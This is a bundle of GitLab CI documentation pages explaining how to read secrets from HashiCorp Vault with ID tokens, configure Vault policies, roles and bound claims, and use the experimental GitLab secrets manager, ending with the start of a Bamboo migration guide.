GitLab has selected [Vault by HashiCorp](https://www.vaultproject.io) as the first supported provider, and [KV-V2](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2) as the first supported secrets engine.

Use [ID tokens](../yaml/_index.md#id_tokens) to [authenticate with Vault](https://developer.hashicorp.com/vault/docs/auth/jwt#jwt-authentication). The [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial has more details about authenticating with ID tokens.

You must [configure your Vault server](#configure-your-vault-server) before you can [use Vault secrets in a CI job](#use-vault-secrets-in-a-ci-job).

The flow for using GitLab with HashiCorp Vault is summarized by this diagram:

![Flow between GitLab and HashiCorp](img/gitlab_vault_workflow_v13_4.png "How GitLab authenticates with HashiCorp Vault")

1. Configure your vault and secrets.
1. Generate your JWT and provide it to your CI job.
1. Runner contacts HashiCorp Vault and authenticates using the JWT.
1. HashiCorp Vault verifies the JWT.
1. HashiCorp Vault checks the bounded claims and attaches policies.
1. HashiCorp Vault returns the token.
1. Runner reads secrets from the HashiCorp Vault.

{{< alert type="note" >}}

Read the [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial for a version of this feature. It's available to all subscription levels, supports writing secrets to and deleting secrets from Vault, and supports multiple secrets engines.

{{< /alert >}}

You must replace the `vault.example.com` URL in the following examples with the URL of your Vault server, and `gitlab.example.com` with the URL of your GitLab instance.

## Vault Secrets Engines

{{< history >}}

- `generic` option [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/366492) in GitLab Runner 16.11.

{{< /history >}}

The Vault Secrets Engines supported by GitLab Runner with the [`secrets:engine:name`](../yaml/_index.md#secretsvault) keyword:

| Secrets engine | `secrets:engine:name` value | Runner version | Details |
|----------------|-----------------------------|----------------|---------|
| [KV secrets engine - version 2](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2) | `kv-v2` | 13.4 | `kv-v2` is the default engine GitLab Runner uses when no engine type is explicitly specified. |
| [KV secrets engine - version 1](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v1) | `kv-v1` or `generic` | 13.4 | Support for the `generic` keyword [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/366492) in GitLab 15.11. |
| [The AWS secrets engine](https://developer.hashicorp.com/vault/docs/secrets/aws) | `generic` | 16.11 | |
| [HashiCorp Vault Artifactory Secrets Plugin](https://jfrog.com/help/r/jfrog-integrations-documentation/hashicorp-vault-artifactory-secrets-plugin) | `generic` | 16.11 | This secrets backend talks to JFrog Artifactory server (5.0.0 or later) and dynamically provisions access tokens with specified scopes. |
## Configure your Vault server

To configure your Vault server:

1. Ensure your Vault server is running on version 1.2.0 or later.
1. Enable the authentication method by running these commands. They provide your Vault server the [OIDC Discovery URL](https://openid.net/specs/openid-connect-discovery-1_0.html) for your GitLab instance, so Vault can fetch the public signing key and verify the JSON Web Token (JWT) when authenticating:

   ```shell
   $ vault auth enable jwt

   $ vault write auth/jwt/config \
     oidc_discovery_url="https://gitlab.example.com" \
     bound_issuer="gitlab.example.com"
   ```

1. Configure policies on your Vault server to grant or forbid access to certain paths and operations. This example grants read access to the set of secrets required by your production environment:

   ```shell
   vault policy write myproject-production - <<EOF
   # Read-only permission on 'ops/data/production/*' path

   path "ops/data/production/*" {
     capabilities = [ "read" ]
   }
   EOF
   ```

1. Configure roles on your Vault server, restricting roles to a project or namespace, as described in [Configure Vault server roles](#configure-vault-server-roles) on this page.
1. [Create the following CI/CD variables](../variables/_index.md#for-a-project) to provide details about your Vault server:
   - `VAULT_SERVER_URL` - The URL of your Vault server, such as `https://vault.example.com:8200`. Required.
   - `VAULT_AUTH_ROLE` - Optional. The role to use when attempting to authenticate. If no role is specified, Vault uses the [default role](https://developer.hashicorp.com/vault/api-docs/auth/jwt#default_role) specified when the authentication method was configured.
   - `VAULT_AUTH_PATH` - Optional. The path where the authentication method is mounted. Default is `jwt`.
   - `VAULT_NAMESPACE` - Optional. The [Vault Enterprise namespace](https://developer.hashicorp.com/vault/docs/enterprise/namespaces) to use for reading secrets and authentication. With:
     - Vault, the `root` ("`/`") namespace is used when no namespace is specified.
     - Vault Open source, the setting is ignored.
     - [HashiCorp Cloud Platform (HCP)](https://www.hashicorp.com/cloud) Vault, a namespace is required. HCP Vault uses the `admin` namespace as the root namespace by default. For example, `VAULT_NAMESPACE=admin`.

{{< alert type="note" >}}

Support for providing these values in the user interface [is tracked in this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/218677).

{{< /alert >}}

## Use Vault secrets in a CI job

{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

After [configuring your Vault server](#configure-your-vault-server), you can use the secrets stored in Vault by defining them with the [`vault` keyword](../yaml/_index.md#secretsvault):

```yaml
job_using_vault:
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    DATABASE_PASSWORD:
      vault: production/db/password@ops
      token: $VAULT_ID_TOKEN
```

In this example:

- `production/db` is the path to the secret.
- `password` is the field.
- `ops` is the path where the secrets engine is mounted.
- `production/db/password@ops` translates to a path of `ops/data/production/db`.
- Authentication is with `$VAULT_ID_TOKEN`.

After GitLab fetches the secret from Vault, the value is saved in a temporary file. The path to this file is stored in a CI/CD variable named `DATABASE_PASSWORD`, similar to [variables of type `file`](../variables/_index.md#use-file-type-cicd-variables).

To overwrite the default behavior, set the `file` option explicitly:

```yaml
job_using_vault:
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    DATABASE_PASSWORD:
      vault: production/db/password@ops
      file: false
      token: $VAULT_ID_TOKEN
```

In this example, the secret value is put directly in the `DATABASE_PASSWORD` variable instead of pointing to a file that holds it.
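Because of the file-type behavior described above for `DATABASE_PASSWORD`, the job script must read the file when a consuming tool expects the raw value. A minimal sketch, assuming a PostgreSQL client as the consumer (the `psql` call, host, and `PGPASSWORD` usage are illustrative, not part of the original example):

```yaml
job_using_vault:
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    DATABASE_PASSWORD:
      vault: production/db/password@ops
      token: $VAULT_ID_TOKEN
  script:
    # $DATABASE_PASSWORD holds a path to a temporary file; read its contents.
    - export PGPASSWORD="$(cat "$DATABASE_PASSWORD")"
    - psql --host db.example.com --username app --command 'SELECT 1;'
```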
## Use a different secrets engine

The `kv-v2` secrets engine is used by default. To use [a different engine](#vault-secrets-engines), add an `engine` section under `vault` in the configuration.

For example, to set the secret engine and path for Artifactory:

```yaml
job_using_vault:
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    JFROG_TOKEN:
      vault:
        engine:
          name: generic
          path: artifactory
        path: production/jfrog
        field: access_token
      file: false
```

In this example, the secret value is obtained from `artifactory/production/jfrog` with a field of `access_token`. The `generic` secrets engine can be used for [`kv-v1`, AWS, Artifactory, and other similar Vault secret engines](#vault-secrets-engines).

## Configure Vault server roles

When a CI job attempts to authenticate, it specifies a role. You can use roles to group different policies together. If authentication is successful, these policies are attached to the resulting Vault token.

[Bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) are predefined values that are matched to the JWT claims. With bounded claims, you can restrict access to specific GitLab users, specific projects, or even jobs running for specific Git references. You can have as many bounded claims as you need, but they must all match for authentication to be successful.

Combining bounded claims with GitLab features like [user roles](../../user/permissions.md) and [protected branches](../../user/project/repository/branches/protected.md), you can tailor these rules to fit your specific use case.
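Before writing `bound_claims`, it can help to look at the claims a pipeline's ID token actually carries. The sketch below decodes the middle (claims) segment of a JWT; a fabricated token stands in here for the job's real `$VAULT_ID_TOKEN`, and the decoding performs no signature verification:

```shell
# Build a fake JWT whose claims segment mimics a pipeline ID token.
payload='{"project_id":"42","ref_type":"tag","ref":"auto-deploy-1"}'
mid=$(printf '%s' "$payload" | base64 | tr -d '\n=' | tr '+/' '-_')
token="eyJhbGciOiJSUzI1NiJ9.${mid}.signature"

# Take the middle segment, undo base64url, restore padding, and decode.
seg=$(printf '%s' "$token" | cut -d. -f2 | tr '_-' '/+')
case $(( ${#seg} % 4 )) in 2) seg="${seg}==" ;; 3) seg="${seg}=" ;; esac
claims=$(printf '%s' "$seg" | base64 -d)
echo "$claims"
```

Run against a real token (for example, by echoing `$VAULT_ID_TOKEN` into the same decoding steps inside a job), this shows exactly which claim values a role's `bound_claims` must match.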
In this example, authentication is allowed only for jobs running for protected tags with names matching the pattern used for production releases:

```shell
$ vault write auth/jwt/role/myproject-production - <<EOF
{
  "role_type": "jwt",
  "policies": ["myproject-production"],
  "token_explicit_max_ttl": 60,
  "user_claim": "user_email",
  "bound_audiences": "https://vault.example.com",
  "bound_claims_type": "glob",
  "bound_claims": {
    "project_id": "42",
    "ref_protected": "true",
    "ref_type": "tag",
    "ref": "auto-deploy-*"
  }
}
EOF
```

{{< alert type="warning" >}}

Always restrict your roles to a project or namespace by using one of the provided claims like `project_id` or `namespace_id`. Without these restrictions, any JWT generated by this GitLab instance may be allowed to authenticate using this role.

{{< /alert >}}

For a full list of ID token JWT claims, read the [How It Works](hashicorp_vault.md) section of the [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial.

You can also specify some attributes for the resulting Vault tokens, such as time-to-live, IP address range, and number of uses. The full list of options is available in [Vault's documentation on creating roles](https://developer.hashicorp.com/vault/api-docs/auth/jwt#create-role) for the JSON web token method.

## Troubleshooting

### Self-signed certificate error: `certificate signed by unknown authority`

When the Vault server is using a self-signed certificate, you see the following error in the job logs:

```plaintext
ERROR: Job failed (system failure): resolving secrets: initializing Vault service: preparing authenticated client: checking Vault server health: Get https://vault.example.com:8000/v1/sys/health?drsecondarycode=299&performancestandbycode=299&sealedcode=299&standbycode=299&uninitcode=299: x509: certificate signed by unknown authority
```

You have two options to solve this error:

- Add the self-signed certificate to the GitLab Runner server's CA store.
  If you deployed GitLab Runner using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), you have to create your own GitLab Runner image.

- Use the `VAULT_CACERT` environment variable to configure GitLab Runner to trust the certificate:

  - If you are using systemd to manage GitLab Runner, see [how to add an environment variable for GitLab Runner](https://docs.gitlab.com/runner/configuration/init.html#setting-custom-environment-variables).
  - If you deployed GitLab Runner using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html):

    1. [Provide a custom certificate for accessing GitLab](https://docs.gitlab.com/runner/install/kubernetes_helm_chart_configuration.html#access-gitlab-with-a-custom-certificate), and make sure to add the certificate for the Vault server instead of the certificate for GitLab. If your GitLab instance is also using a self-signed certificate, you should be able to add both in the same `Secret`.
    1. Add the following lines in your `values.yaml` file:

       ```yaml
       ## Replace both the <SECRET_NAME> and the <VAULT_CERTIFICATE>
       ## with the actual values you used to create the secret

       certsSecretName: <SECRET_NAME>

       envVars:
         - name: VAULT_CACERT
           value: "/home/gitlab-runner/.gitlab-runner/certs/<VAULT_CERTIFICATE>"
       ```

If you are running a Vault server in development mode locally with the [GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit), you might also get this error. You can manually ask the system to trust the self-signed certificate of the Vault server. This [sample tutorial](https://iboysoft.com/tips/how-to-trust-a-certificate-on-mac.html) explains how to do this on macOS.
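Whichever route you take, it can help to first confirm that the file you plan to point `VAULT_CACERT` at is a valid PEM certificate. A hedged sketch, where a throwaway self-signed certificate stands in for the Vault server's real one (the paths and CN are placeholders):

```shell
# Generate a throwaway self-signed certificate as a stand-in for the
# Vault server's certificate (placeholder CN and paths).
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout /tmp/vault.key -out /tmp/vault.crt \
  -subj "/CN=vault.example.com"

# Confirm the file parses as an X.509 certificate before relying on it.
openssl x509 -in /tmp/vault.crt -noout -subject

# Point GitLab Runner at it (for a shell-managed runner environment).
export VAULT_CACERT=/tmp/vault.crt
```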
### `resolving secrets: secret not found: MY_SECRET` error

When GitLab is unable to find the secret in the vault, you might receive this error:

```plaintext
ERROR: Job failed (system failure): resolving secrets: secret not found: MY_SECRET
```

Check that the `vault` value is [correctly configured in the CI/CD job](#use-vault-secrets-in-a-ci-job).

You can use the [`kv` command with the Vault CLI](https://developer.hashicorp.com/vault/docs/commands/kv) to check if the secret is retrievable to help determine the syntax for the `vault` value in your CI/CD configuration. For example, to retrieve the secret:

```shell
$ vault kv get -field=password -namespace=admin -mount=ops "production/db"
this-is-a-password
```
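When debugging the `vault` value, it can also help to work out by hand which API path the shorthand maps to. As described earlier, `<path>/<field>@<mount>` translates to `<mount>/data/<path>` for KV-v2; a small shell sketch of that translation:

```shell
# Translate the `secrets:vault` shorthand "<path>/<field>@<mount>"
# into the KV-v2 API path "<mount>/data/<path>" plus the field name.
spec='production/db/password@ops'

mount=${spec#*@}          # text after the "@": the mount path
path_field=${spec%@*}     # text before the "@": "<path>/<field>"
field=${path_field##*/}   # last path segment: the field
path=${path_field%/*}     # everything before it: the secret path

echo "${mount}/data/${path}"   # ops/data/production/db
echo "${field}"                # password
```

Comparing this computed path and field against what `vault kv get` can actually retrieve usually pinpoints the misconfiguration.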
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using external secrets in CI breadcrumbs: - doc - ci - secrets --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Secrets represent sensitive information your CI job needs to complete work. This sensitive information can be items like API tokens, database credentials, or private keys. Secrets are sourced from your secrets provider. Unlike CI/CD variables, which are always presented to a job, secrets must be explicitly required by a job. Read [GitLab CI/CD pipeline configuration reference](../yaml/_index.md#secrets) for more information about the syntax. GitLab provides support for the following secret management providers: 1. [Vault by HashiCorp](#use-vault-secrets-in-a-ci-job) 1. [Google Cloud Secret Manager](gcp_secret_manager.md) 1. [Azure Key Vault](azure_key_vault.md) GitLab has selected [Vault by HashiCorp](https://www.vaultproject.io) as the first supported provider, and [KV-V2](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2) as the first supported secrets engine. Use [ID tokens](../yaml/_index.md#id_tokens) to [authenticate with Vault](https://developer.hashicorp.com/vault/docs/auth/jwt#jwt-authentication). The [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial has more details about authenticating with ID tokens. You must [configure your Vault server](#configure-your-vault-server) before you can [use Vault secrets in a CI job](#use-vault-secrets-in-a-ci-job). The flow for using GitLab with HashiCorp Vault is summarized by this diagram: ![Flow between GitLab and HashiCorp](img/gitlab_vault_workflow_v13_4.png "How GitLab authenticates with HashiCorp Vault") 1. 
Configure your vault and secrets. 1. Generate your JWT and provide it to your CI job. 1. Runner contacts HashiCorp Vault and authenticates using the JWT. 1. HashiCorp Vault verifies the JWT. 1. HashiCorp Vault checks the bounded claims and attaches policies. 1. HashiCorp Vault returns the token. 1. Runner reads secrets from the HashiCorp Vault. {{< alert type="note" >}} Read the [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial for a version of this feature. It's available to all subscription levels, supports writing secrets to and deleting secrets from Vault, and supports multiple secrets engines. {{< /alert >}} You must replace the `vault.example.com` URL in the following examples with the URL of your Vault server, and `gitlab.example.com` with the URL of your GitLab instance. ## Vault Secrets Engines {{< history >}} - `generic` option [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/366492) in GitLab Runner 16.11. {{< /history >}} The Vault Secrets Engines supported by GitLab Runner with the [`secrets:engine:name`](../yaml/_index.md#secretsvault) keyword: | Secrets engine | `secrets:engine:name` value | Runner version | Details | |----------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------|----------------|---------| | [KV secrets engine - version 2](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v2) | `kv-v2` | 13.4 | `kv-v2` is the default engine GitLab Runner uses when no engine type is explicitly specified. | | [KV secrets engine - version 1](https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v1) | `kv-v1` or `generic` | 13.4 | Support for the `generic` keyword [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/366492) in GitLab 15.11. 
| | [The AWS secrets engine](https://developer.hashicorp.com/vault/docs/secrets/aws) | `generic` | 16.11 | | | [HashiCorp Vault Artifactory Secrets Plugin](https://jfrog.com/help/r/jfrog-integrations-documentation/hashicorp-vault-artifactory-secrets-plugin) | `generic` | 16.11 | This secrets backend talks to JFrog Artifactory server (5.0.0 or later) and dynamically provisions access tokens with specified scopes. | ## Configure your Vault server To configure your Vault server: 1. Ensure your Vault server is running on version 1.2.0 or later. 1. Enable the authentication method by running these commands. They provide your Vault server the [OIDC Discovery URL](https://openid.net/specs/openid-connect-discovery-1_0.html) for your GitLab instance, so Vault can fetch the public signing key and verify the JSON Web Token (JWT) when authenticating: ```shell $ vault auth enable jwt $ vault write auth/jwt/config \ oidc_discovery_url="https://gitlab.example.com" \ bound_issuer="gitlab.example.com" ``` 1. Configure policies on your Vault server to grant or forbid access to certain paths and operations. This example grants read access to the set of secrets required by your production environment: ```shell vault policy write myproject-production - <<EOF # Read-only permission on 'ops/data/production/*' path path "ops/data/production/*" { capabilities = [ "read" ] } EOF ``` 1. Configure roles on your Vault server, restricting roles to a project or namespace, as described in [Configure Vault server roles](#configure-vault-server-roles) on this page. 1. [Create the following CI/CD variables](../variables/_index.md#for-a-project) to provide details about your Vault server: - `VAULT_SERVER_URL` - The URL of your Vault server, such as `https://vault.example.com:8200`. Required. - `VAULT_AUTH_ROLE` - Optional. The role to use when attempting to authenticate. 
If no role is specified, Vault uses the [default role](https://developer.hashicorp.com/vault/api-docs/auth/jwt#default_role) specified when the authentication method was configured. - `VAULT_AUTH_PATH` - Optional. The path where the authentication method is mounted, default is `jwt`. - `VAULT_NAMESPACE` - Optional. The [Vault Enterprise namespace](https://developer.hashicorp.com/vault/docs/enterprise/namespaces) to use for reading secrets and authentication. With: - Vault, the `root` ("`/`") namespace is used when no namespace is specified. - Vault Open source, the setting is ignored. - [HashiCorp Cloud Platform (HCP)](https://www.hashicorp.com/cloud) Vault, a namespace is required. HCP Vault uses the `admin` namespace as the root namespace by default. For example, `VAULT_NAMESPACE=admin`. {{< alert type="note" >}} Support for providing these values in the user interface [is tracked in this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/218677). {{< /alert >}} ## Use Vault secrets in a CI job {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} After [configuring your Vault server](#configure-your-vault-server), you can use the secrets stored in Vault by defining them with the [`vault` keyword](../yaml/_index.md#secretsvault): ```yaml job_using_vault: id_tokens: VAULT_ID_TOKEN: aud: https://vault.example.com secrets: DATABASE_PASSWORD: vault: production/db/password@ops token: $VAULT_ID_TOKEN ``` In this example: - `production/db` is the path to the secret. - `password` is the field. - `ops` is the path where the secrets engine is mounted. - `production/db/password@ops` translates to a path of `ops/data/production/db`. - Authentication is with `$VAULT_ID_TOKEN`. After GitLab fetches the secret from Vault, the value is saved in a temporary file. 
The path to this file is stored in a CI/CD variable named `DATABASE_PASSWORD`, similar to [variables of type `file`](../variables/_index.md#use-file-type-cicd-variables). To overwrite the default behavior, set the `file` option explicitly:

```yaml
secrets:
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  DATABASE_PASSWORD:
    vault: production/db/password@ops
    file: false
    token: $VAULT_ID_TOKEN
```

In this example, the secret value is put directly in the `DATABASE_PASSWORD` variable instead of pointing to a file that holds it.

## Use a different secrets engine

The `kv-v2` secrets engine is used by default. To use [a different engine](#vault-secrets-engines), add an `engine` section under `vault` in the configuration.

For example, to set the secrets engine and path for Artifactory:

```yaml
job_using_vault:
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    JFROG_TOKEN:
      vault:
        engine:
          name: generic
          path: artifactory
        path: production/jfrog
        field: access_token
      file: false
```

In this example, the secret value is obtained from `artifactory/production/jfrog` with a field of `access_token`. The `generic` secrets engine can be used for [`kv-v1`, AWS, Artifactory, and other similar Vault secrets engines](#vault-secrets-engines).

## Configure Vault server roles

When a CI job attempts to authenticate, it specifies a role. You can use roles to group different policies together. If authentication is successful, these policies are attached to the resulting Vault token.

[Bound claims](https://developer.hashicorp.com/vault/docs/auth/jwt#bound-claims) are predefined values that are matched to the JWT claims. With bound claims, you can restrict access to specific GitLab users, specific projects, or even jobs running for specific Git references. You can have as many bound claims as you need, but they must all match for authentication to be successful.
Combining bound claims with GitLab features like [user roles](../../user/permissions.md) and [protected branches](../../user/project/repository/branches/protected.md), you can tailor these rules to fit your specific use case. In this example, authentication is allowed only for jobs running for protected tags with names matching the pattern used for production releases:

```shell
$ vault write auth/jwt/role/myproject-production - <<EOF
{
  "role_type": "jwt",
  "policies": ["myproject-production"],
  "token_explicit_max_ttl": 60,
  "user_claim": "user_email",
  "bound_audiences": "https://vault.example.com",
  "bound_claims_type": "glob",
  "bound_claims": {
    "project_id": "42",
    "ref_protected": "true",
    "ref_type": "tag",
    "ref": "auto-deploy-*"
  }
}
EOF
```

{{< alert type="warning" >}}

Always restrict your roles to a project or namespace by using one of the provided claims like `project_id` or `namespace_id`. Without these restrictions, any JWT generated by this GitLab instance may be allowed to authenticate using this role.

{{< /alert >}}

For a full list of ID token JWT claims, read the [How It Works](hashicorp_vault.md) section of the [Authenticating and Reading Secrets With HashiCorp Vault](hashicorp_vault.md) tutorial.

You can also specify some attributes for the resulting Vault tokens, such as time-to-live, IP address range, and number of uses. The full list of options is available in [Vault's documentation on creating roles](https://developer.hashicorp.com/vault/api-docs/auth/jwt#create-role) for the JSON web token method.
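A job that authenticates with this role selects it through the `VAULT_AUTH_ROLE` variable (shown here as a job-level variable; you can also define it as a project CI/CD variable, as described earlier). This is a sketch that assumes the role and policy names used above (`myproject-production`), the `ops` mount from the earlier policy example, and a hypothetical `deploy.sh` script:

```yaml
deploy_production:
  variables:
    VAULT_AUTH_ROLE: myproject-production  # must match the Vault role name
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com  # must match the role's bound_audiences
  secrets:
    DATABASE_PASSWORD:
      vault: production/db/password@ops
      token: $VAULT_ID_TOKEN
  script:
    - ./deploy.sh  # hypothetical deployment script that reads $DATABASE_PASSWORD
  rules:
    - if: $CI_COMMIT_TAG =~ /^auto-deploy-/  # mirror the role's ref bound claim
```

Because the role binds `ref_type: tag` and `ref: auto-deploy-*`, this job only authenticates successfully when it runs for a matching protected tag.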
## Troubleshooting ### Self-signed certificate error: `certificate signed by unknown authority` When the Vault server is using a self-signed certificate, you see the following error in the job logs: ```plaintext ERROR: Job failed (system failure): resolving secrets: initializing Vault service: preparing authenticated client: checking Vault server health: Get https://vault.example.com:8000/v1/sys/health?drsecondarycode=299&performancestandbycode=299&sealedcode=299&standbycode=299&uninitcode=299: x509: certificate signed by unknown authority ``` You have two options to solve this error: - Add the self-signed certificate to the GitLab Runner server's CA store. If you deployed GitLab Runner using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html), you have to create your own GitLab Runner image. - Use the `VAULT_CACERT` environment variable to configure GitLab Runner to trust the certificate: - If you are using systemd to manage GitLab Runner, see [how to add an environment variable for GitLab Runner](https://docs.gitlab.com/runner/configuration/init.html#setting-custom-environment-variables). - If you deployed GitLab Runner using the [Helm chart](https://docs.gitlab.com/runner/install/kubernetes.html): 1. [Provide a custom certificate for accessing GitLab](https://docs.gitlab.com/runner/install/kubernetes_helm_chart_configuration.html#access-gitlab-with-a-custom-certificate), and make sure to add the certificate for the Vault server instead of the certificate for GitLab. If your GitLab instance is also using a self-signed certificate, you should be able to add both in the same `Secret`. 1. 
Add the following lines in your `values.yaml` file:

```yaml
## Replace both the <SECRET_NAME> and the <VAULT_CERTIFICATE>
## with the actual values you used to create the secret
certsSecretName: <SECRET_NAME>
envVars:
  - name: VAULT_CACERT
    value: "/home/gitlab-runner/.gitlab-runner/certs/<VAULT_CERTIFICATE>"
```

If you are running a Vault server in development mode locally with the [GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit), you might also get this error. You can manually ask the system to trust the self-signed certificate of the Vault server. This [sample tutorial](https://iboysoft.com/tips/how-to-trust-a-certificate-on-mac.html) explains how to do this on macOS.

### `resolving secrets: secret not found: MY_SECRET` error

When GitLab is unable to find the secret in Vault, you might receive this error:

```plaintext
ERROR: Job failed (system failure): resolving secrets: secret not found: MY_SECRET
```

Check that the `vault` value is [correctly configured in the CI/CD job](#use-vault-secrets-in-a-ci-job).

You can use the [`kv` command with the Vault CLI](https://developer.hashicorp.com/vault/docs/commands/kv) to check if the secret is retrievable to help determine the syntax for the `vault` value in your CI/CD configuration. For example, to retrieve the secret:

```shell
$ vault kv get -field=password -namespace=admin -mount=ops "production/db"
this-is-a-password
```
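The `vault kv get` command above corresponds to the following job configuration — a sketch reusing the same namespace (`admin`), mount (`ops`), path (`production/db`), and field (`password`):

```yaml
job_using_vault:
  variables:
    VAULT_NAMESPACE: admin  # same namespace as the -namespace flag
  id_tokens:
    VAULT_ID_TOKEN:
      aud: https://vault.example.com
  secrets:
    DATABASE_PASSWORD:
      vault: production/db/password@ops  # path/field@mount, matching the CLI flags
      token: $VAULT_ID_TOKEN
```

If the CLI command succeeds but the job still fails, compare each segment of the `vault` value against the flags you passed to `vault kv get`.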
---
stage: Software Supply Chain Security
group: Pipeline Security
title: GitLab secrets manager
source: https://docs.gitlab.com/ci/secrets/secrets_manager
repository: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/secrets/_index.md
extracted: 2025-08-13
---
{{< details >}}

- Tier: Ultimate
- Status: Experiment

{{< /details >}}

{{< history >}}

- [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/16319) in GitLab 18.3 [with the flags](../../../development/feature_flags/_index.md) `secrets_manager` and `ci_tanukey_ui`. Disabled by default.

{{< /history >}}

{{< alert type="warning" >}}

This feature is an [experiment](../../../policy/development_stages_support.md#experiment) and subject to change without notice. This feature is not ready for production use.

{{< /alert >}}

Secrets represent sensitive information your CI/CD jobs need to function. Secrets could be access tokens, database credentials, private keys, or similar. Unlike CI/CD variables, which are always available to jobs by default, secrets must be explicitly requested by a job.

Use the GitLab secrets manager to securely store and manage your project's secrets and credentials.

## Enable the secrets manager

Prerequisites:

- You must have the Owner role for the project.

To enable the secrets manager:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Settings > General**.
1. Expand **Visibility, project features, permissions**.
1. Turn on the **Secrets Manager** toggle and wait for the secrets manager to be provisioned.

## Define a secret

You can add secrets to the secrets manager so that they can be used in secure CI/CD pipelines and workflows.

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Secure > Secrets manager**.
1. Select **Add secret** and fill in the details:
   - **Name**: Must be unique in the project.
   - **Value**: No limitations.
   - **Description**: Maximum of 200 characters.
   - **Environments**: Can be:
     - **All (default)** (`*`)
     - A specific [environment](../../environments/_index.md#types-of-environments)
     - A [wildcard environment](../../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable).
   - **Branch**: Any branch from the project.
   - **Expiration date**: Secrets become unavailable after the expiration date.

After you create a secret, you can use it in the pipeline configuration or in job scripts.

## Use secrets in job scripts

To access secrets defined with the secrets manager, use the [`secrets`](../../yaml/_index.md#secrets) and `gitlab_secrets_manager` keywords:

```yaml
job:
  secrets:
    TEST_SECRET:
      gitlab_secrets_manager:
        name: foo
  script:
    - cat $TEST_SECRET
```
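Secrets can also be scoped to an environment when they are defined. This sketch shows a deployment job requesting such a secret; the secret name `database-password`, the assumption that its **Environments** setting is `production`, and the `deploy.sh` script are all hypothetical:

```yaml
deploy:
  stage: deploy
  environment: production  # run the job in the environment the secret was scoped to
  secrets:
    DB_PASSWORD:
      gitlab_secrets_manager:
        name: database-password  # hypothetical secret name
  script:
    - ./deploy.sh  # hypothetical script that reads $DB_PASSWORD
```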
---
stage: Verify
group: Pipeline Execution
title: Migrating from Bamboo
source: https://docs.gitlab.com/ci/bamboo
repository: https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/bamboo.md
extracted: 2025-08-13
---
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} This migration guide looks at how you can migrate from Atlassian Bamboo to GitLab CI/CD. The focus is on [Bamboo Specs YAML](https://docs.atlassian.com/bamboo-specs-docs/8.1.12/specs.html?yaml) exported from the Bamboo UI or stored in Spec repositories. ## GitLab CI/CD Primer If you are new to GitLab CI/CD, use the [Getting started guide](../_index.md) to learn the basic concepts and how to create your first [`.gitlab-ci.yml` file](../quick_start/_index.md). If you already have some experience using GitLab CI/CD, you can review [CI/CD YAML syntax reference](../yaml/_index.md) to see the full list of available keywords. You can also take a look at [Auto DevOps](../../topics/autodevops/_index.md), which automatically builds, tests, and deploys your application using a collection of pre-configured features and integrations. ## Key similarities and differences ### Offerings Atlassian offers Bamboo in its Cloud (SaaS) or Data center (self-hosted) options. A third Server option is scheduled for [EOL on February 15, 2024](https://about.gitlab.com/blog/2023/09/26/atlassian-server-ending-move-to-a-single-devsecops-platform/). These options are similar to [GitLab.com](../../subscriptions/gitlab_com/_index.md) and [GitLab Self-Managed](../../subscriptions/self_managed/_index.md). GitLab also offers [GitLab Dedicated](../../subscriptions/gitlab_dedicated/_index.md), a fully isolated single-tenant SaaS service. ### Agents vs Runners Bamboo uses [agents](https://confluence.atlassian.com/bamboo/configuring-agents-289277172.html) to run builds and deployments. Agents can be local agents running on the Bamboo server or remote agents running external to the server. GitLab uses a similar concept to agents called [runners](https://docs.gitlab.com/runner/) which use [executors](https://docs.gitlab.com/runner/executors/) to run builds. 
